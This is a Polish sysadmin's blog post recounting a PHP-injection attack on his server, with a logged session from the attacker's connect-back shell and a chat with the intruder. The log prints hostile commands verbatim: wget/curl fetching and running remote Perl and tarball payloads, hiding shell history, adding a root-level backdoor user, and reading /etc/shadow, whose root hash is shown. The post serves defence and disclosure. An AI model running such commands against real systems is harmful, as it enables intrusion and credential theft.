Pogadanka z hackerem xeQt

Niestety ja należę to tych zboczonych adminów, co przeglądają regularnie logi systemowe. Ostatnio wykryłem, że jakiś gostek usiłuje mi zrobić PHP injection i jest w tym dosyć upierdliwy. Jak wiadomo PHP injection polega na wykonaniu zdalnego kodu PHP przez niezabezpieczone skrypty. Ściągnąlem sobie ten zdalny kod PHP i zacząłem go analizować. Wnioski z tego były następujące:

1. skrypt łączy się do serwera w niemczech (217.115.144.184) na port  9991 i zostawia info "kolejny frajer zhackowany", następnie oczekuje na komendy i je uruchamia
2. ustanawia połączenie z serwerem IRC, podłącza do kanału i oczekuje na różne polecenia (komendy shela, flood, spam, ddos etc.)
3. ściąga dodatkowe "moduły" na przykład robiące serwer proxy

Połączyłem się zatem do tego serwera w niemczech, wysłałem stosowny komunikat i czekałem co się stanie. Jednocześnie wskoczyłem na kanał IRC irc://undernet/hackphreak, gdzie aktualnie siedział hacker (google są niezłe). Poniżej zapis "rozmowy" (to co ja pisałem jest podkreślone):

# telnet 217.115.144.184 9991
Trying 217.115.144.184...
Connected to ds217-115-144-184.dedicated.hosteurope.de (217.115.144.184).
Escape character is '^]'.
[+] Conectback by xeQt...

[x] Systeminfo
Linux athlon.lemat.priv.pl 2.6.12-27mdk-i686-up-4GB #1 \
Tue Sep 26 12:41:29 MDT 2006 i686 AMD Athlon(tm) Processor unknown GNU/Linux

[x] Uptime
 14:30:45 up 43 days, 21 min,  1 user,  load average: 0.06, 0.04, 0.01

[x] Userinfo
uid=0(root) gid=0(root) grupy=0(root)

[x] Dir
/var/www/html

wget http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt
id

id
uid=0(root) gid=0(root) grupy=0(root)
uid=0(root) gid=0(root) grupy=0(root)
unset HISTFILE;wget http://members.lycos.co.uk/mrx25/mrx.tgz;tar xzvf mrx.tgz;\
rm -rf mrx.tgz;mv mrx .mrx;cd .mrx;chmod +x *;./setup marius14115 65501

id
uid=0(root) gid=0(root) grupy=0(root)
wget
curl
id
uptime
uid=0(root) gid=0(root) grupy=0(root)
 14:38:34 up 43 days, 29 min,  2 users,  load average: 0.02, 0.04, 0.00
who
wget http://members.lycos.co.uk/mrx25/mrx.tgz;tar xzvf mrx.tgz;rm -rf mrx.tgz;\
mv mrx .mrx;cd .mrx;chmod +x *;./setup marius14115 65501
root     pts/0        Feb 13 14:28 (new586.lemat.priv.pl)
root     pts/1        Feb 13 14:35 (new586.lemat.priv.pl)
useradd -g 0 -u 0 -o xeqt;passwd xeqt

id
uid=0(root) gid=0(root) grupy=0(root)
cat /etc/shadow
root:$1$oC7iy.OK$OJx9jvBR/FudMXivODqFp/:13483:0:99999:7:::
bin:*:13189:0:99999:7:::
daemon:*:13189:0:99999:7:::
adm:*:13189:0:99999:7:::
lp:*:13189:0:99999:7:::
sync:*:13189:0:99999:7:::
shutdown:*:13189:0:99999:7:::
halt:*:13189:0:99999:7:::
mail:*:13189:0:99999:7:::
news:*:13189:0:99999:7:::
uucp:*:13189:0:99999:7:::
operator:*:13189:0:99999:7:::
games:*:13189:0:99999:7:::
nobody:*:13189:0:99999:7:::
rpm:!!:13189::::::
vcsa:!!:13189::::::
messagebus:!!:13189::::::
sshd:!!:13189::::::
ftp:!!:13189::::::
xfs:!!:13189::::::
mysql:!!:13189::::::
apache:!!:13190:0:99999:7:::
postfix:!!:13190:0:99999:7:::
amavis:!!:13190:0:99999:7:::
named:!!:13191:0:99999:7:::
postgrey:!!:13191:0:99999:7:::
rbldns:!!:13436::::::
curl -O http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt
curl -O http://members.lycos.co.uk/mrx25/vx8s.txt;perl vx8s.txt;rm -rf vx8s.txt
id
uid=0(root) gid=0(root) grupy=0(root)
/usr/sbin/useradd -g 0 -u 0 -o xeqt;passwd xeqt
id
uid=0(root) gid=0(root) grupy=0(root)
wget
GET
gertch
fetch

id
id;uname -a;uptime
uptime




W tym momencie zostałem zauważony na IRCu
hi xeQt

id
uid=0(root) gid=0(root) grupy=0(root)

ps ax
25766 pts/0    S+     0:00 telnet 217.115.144.184 9991

id
uid=0(root) gid=0(root) grupy=0(root)
id
uid=0(root) gid=0(root) grupy=0(root)





A w tym momencie zdecydował się pogadać ze mną poza IRCem - 
zaczeliśmy omawiać dosyć "prywatne" sprawy



hello
hi xeQt
gonna get me?
nope, I'm not fed (nie jestem z FBI, przyp. lemat)
why dont u kill it?

My hands are shaking of laugh and I cannot type process id...

its useless call em but good luck
heh'
so? you called feds`?
not yet
ill play some poker while i wait
good luck
dont need it, im alwise goood
take peoples money and root's
ehh
e
good luck to your opponents then
yea, they need it
one more thing: what's the purpose of gathering botnet?

you goto update your kernel, its vulnable
its big money here
not bots
fuck that
you gonna sell it?
who need to work when you get 2000$ everyday

nop
your info
but you have nothing i can use
and its slower than 5mb/s download
so its useless to me
its business, dont take it personal
I dont quite understand, why my personal info is so valuable?
ifconfig | grep inet | grep -v 127.0.0.1 | wc -l | sed 's/ //g'
ill ignore ytour ips
were both from europs so
ill be nice to you
I have 3 interfaces if you want to know
i know:)
no, you don't ;)
I dont quite understand, why my personal info is so valuable?
its not
you have nothing i can use
ok "others info"
and your root is not useful to me
money $$$$$$$$
10.000$ a month
its not good?
it is
it is
thats why
i dont need no once root
just info
bots, ddos and all that shit, its useless
i dont flood or spam
info is usefull to me and others
like name, phone number, visa number?
visa, paypal, bank logins
i dont call people
phone is not
nigerians phone people
im a bitch, but thats the way it is, just secure your shit, and its no problem

I have to go, a friendly message from me: hide yourself better, if I tracked \
you, betters will do it also
hehe
Bye
kill this term
chao

Chcecie też sobie pogadać?

cut -d" " -f7  access_log|grep "http://"
(log apacza typu combined)

Wyświetli listę skryptów typu PHP injection, które były ostatnio "testowane" na Waszym serwerze. Trzeba taki skrypt ściągnąć i przeanalizować. Oczywiście nie radzę wykonywać.

Komentarze: